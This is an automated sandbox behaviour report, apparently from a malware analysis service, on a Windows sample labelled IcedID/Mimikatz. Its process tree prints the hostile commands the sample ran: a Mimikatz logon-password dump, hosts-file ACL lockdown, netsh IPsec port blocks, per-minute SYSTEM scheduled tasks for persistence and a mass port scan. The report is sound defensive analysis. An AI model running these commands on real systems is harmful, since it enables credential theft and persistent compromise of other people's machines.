opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3176 PING.EXE 3368 cmd.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023476-6.dat nsis_installer_2 behavioral2/files/0x000700000002347d-14.dat nsis_installer_1 behavioral2/files/0x000700000002347d-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 39 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zitgyhd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zitgyhd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zitgyhd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zitgyhd.exe Key created \REGISTRY\USER\.DEFAULT\Software bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zitgyhd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zitgyhd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bfbzkfznz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bfbzkfznz.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zitgyhd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zitgyhd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zitgyhd.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3176 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1688 schtasks.exe 2856 schtasks.exe 1836 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4360 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 4360 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3200 zitgyhd.exe Token: SeDebugPrivilege 4884 zitgyhd.exe Token: SeDebugPrivilege 3928 vfshost.exe Token: SeDebugPrivilege 4892 bfbzkfznz.exe Token: SeLockMemoryPrivilege 824 znfeub.exe Token: SeLockMemoryPrivilege 824 znfeub.exe Token: SeDebugPrivilege 2716 bfbzkfznz.exe Token: SeDebugPrivilege 1200 bfbzkfznz.exe Token: SeDebugPrivilege 1592 bfbzkfznz.exe Token: SeDebugPrivilege 1736 bfbzkfznz.exe Token: SeDebugPrivilege 964 bfbzkfznz.exe Token: SeDebugPrivilege 3096 bfbzkfznz.exe Token: SeDebugPrivilege 3280 bfbzkfznz.exe Token: SeDebugPrivilege 3044 bfbzkfznz.exe Token: SeDebugPrivilege 1864 bfbzkfznz.exe Token: SeDebugPrivilege 1692 bfbzkfznz.exe Token: SeDebugPrivilege 4496 bfbzkfznz.exe Token: SeDebugPrivilege 4680 bfbzkfznz.exe Token: SeDebugPrivilege 2216 bfbzkfznz.exe Token: SeDebugPrivilege 4040 bfbzkfznz.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4360 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe 4360 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe 3200 zitgyhd.exe 3200 zitgyhd.exe 4884 zitgyhd.exe 4884 zitgyhd.exe 4492 xohudmc.exe 208 umueiy.exe 3176 zitgyhd.exe 3176 zitgyhd.exe 232 zitgyhd.exe 232 zitgyhd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4360 wrote to memory of 3368 4360 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe 86 PID 4360 wrote to memory of 3368 4360 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe 86 PID 4360 wrote to memory of 3368 4360 2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe 86 PID 3368 wrote to memory of 3176 3368 cmd.exe 89 PID 3368 wrote to memory of 3176 3368 cmd.exe 89 PID 3368 wrote to memory of 3176 3368 cmd.exe 89 PID 3368 wrote to memory of 3200 3368 cmd.exe 91 PID 3368 wrote to memory of 3200 3368 cmd.exe 91 PID 3368 wrote to memory of 3200 3368 cmd.exe 91 PID 4884 wrote to memory of 5068 4884 zitgyhd.exe 93 PID 4884 wrote to memory of 5068 4884 zitgyhd.exe 93 PID 4884 wrote to memory of 5068 4884 zitgyhd.exe 93 PID 5068 wrote to memory of 4852 5068 cmd.exe 95 PID 5068 wrote to memory of 4852 5068 cmd.exe 95 PID 5068 wrote to memory of 4852 5068 cmd.exe 95 PID 5068 wrote to memory of 2436 5068 cmd.exe 96 PID 5068 wrote to memory of 2436 5068 cmd.exe 96 PID 5068 wrote to memory of 2436 5068 cmd.exe 96 PID 5068 wrote to memory of 4900 5068 cmd.exe 97 PID 5068 wrote to memory of 4900 5068 cmd.exe 97 PID 5068 wrote to memory of 4900 5068 cmd.exe 97 PID 5068 wrote to memory of 1432 5068 cmd.exe 98 PID 5068 wrote to memory of 1432 5068 cmd.exe 98 PID 5068 wrote to memory of 1432 5068 cmd.exe 98 PID 5068 wrote to memory of 1688 5068 cmd.exe 99 PID 5068 wrote to memory of 1688 5068 cmd.exe 99 PID 5068 wrote to memory of 1688 5068 cmd.exe 99 PID 5068 wrote to memory of 756 5068 cmd.exe 100 PID 5068 wrote to memory of 756 5068 cmd.exe 100 PID 5068 wrote to memory of 756 5068 cmd.exe 100 PID 4884 wrote to memory of 4140 4884 zitgyhd.exe 101 PID 4884 wrote to memory of 4140 4884 zitgyhd.exe 101 PID 4884 wrote to memory of 4140 4884 zitgyhd.exe 101 PID 4884 wrote to memory of 4328 4884 zitgyhd.exe 103 PID 4884 wrote to memory of 4328 4884 zitgyhd.exe 103 PID 4884 wrote to memory of 4328 4884 zitgyhd.exe 103 PID 4884 wrote to memory of 3744 4884 zitgyhd.exe 105 PID 4884 wrote to memory of 3744 4884 zitgyhd.exe 105 PID 4884 wrote to memory of 3744 4884 zitgyhd.exe 105 PID 4884 wrote to memory of 2924 4884 zitgyhd.exe 107 PID 4884 wrote to memory of 2924 4884 zitgyhd.exe 107 PID 4884 wrote to memory of 2924 4884 zitgyhd.exe 107 PID 2924 wrote to memory of 4396 2924 cmd.exe 109 PID 2924 wrote to memory of 4396 2924 cmd.exe 109 PID 2924 wrote to memory of 4396 2924 cmd.exe 109 PID 4396 wrote to memory of 3436 4396 wpcap.exe 110 PID 4396 wrote to memory of 3436 4396 wpcap.exe 110 PID 4396 wrote to memory of 3436 4396 wpcap.exe 110 PID 3436 wrote to memory of 3412 3436 net.exe 112 PID 3436 wrote to memory of 3412 3436 net.exe 112 PID 3436 wrote to memory of 3412 3436 net.exe 112 PID 4396 wrote to memory of 1888 4396 wpcap.exe 113 PID 4396 wrote to memory of 1888 4396 wpcap.exe 113 PID 4396 wrote to memory of 1888 4396 wpcap.exe 113 PID 1888 wrote to memory of 4060 1888 net.exe 115 PID 1888 wrote to memory of 4060 1888 net.exe 115 PID 1888 wrote to memory of 4060 1888 net.exe 115 PID 4396 wrote to memory of 1068 4396 wpcap.exe 116 PID 4396 wrote to memory of 1068 4396 wpcap.exe 116 PID 4396 wrote to memory of 1068 4396 wpcap.exe 116 PID 1068 wrote to memory of 4548 1068 net.exe 118 PID 1068 wrote to memory of 4548 1068 net.exe 118 PID 1068 wrote to memory of 4548 1068 net.exe 118 PID 4396 wrote to memory of 4488 4396 wpcap.exe 119
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2108
-
C:\Windows\TEMP\mqwuhfzzz\znfeub.exe"C:\Windows\TEMP\mqwuhfzzz\znfeub.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-08_8e369d75e4cf723bc3a054edacff4f34_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gfuncgqi\zitgyhd.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3176
-
-
C:\Windows\gfuncgqi\zitgyhd.exeC:\Windows\gfuncgqi\zitgyhd.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3200
-
-
-
C:\Windows\gfuncgqi\zitgyhd.exeC:\Windows\gfuncgqi\zitgyhd.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4852
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4900
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:1432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1688
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:756
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4140
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4328
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3744
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gzhzydtbv\uubgcusib\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\gzhzydtbv\uubgcusib\wpcap.exeC:\Windows\gzhzydtbv\uubgcusib\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3412
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4060
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4548
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4488 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1616 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4128 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:112
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3568 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4896
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gzhzydtbv\uubgcusib\hcdfzcnbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gzhzydtbv\uubgcusib\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:964 -
C:\Windows\gzhzydtbv\uubgcusib\hcdfzcnbq.exeC:\Windows\gzhzydtbv\uubgcusib\hcdfzcnbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gzhzydtbv\uubgcusib\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gzhzydtbv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gzhzydtbv\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3208 -
C:\Windows\gzhzydtbv\Corporate\vfshost.exeC:\Windows\gzhzydtbv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kduuybgbi" /ru system /tr "cmd /c C:\Windows\ime\zitgyhd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:208 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kduuybgbi" /ru system /tr "cmd /c C:\Windows\ime\zitgyhd.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iutfgzgks" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gfuncgqi\zitgyhd.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2188 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iutfgzgks" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gfuncgqi\zitgyhd.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ziqsfiiui" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mqwuhfzzz\znfeub.exe /p everyone:F"2⤵PID:4296
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ziqsfiiui" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mqwuhfzzz\znfeub.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1688
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3460
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1272
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1148
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3876
-
-
